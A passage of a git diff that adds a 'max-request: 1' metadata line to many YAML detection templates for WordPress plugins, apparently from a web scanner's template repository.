b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + 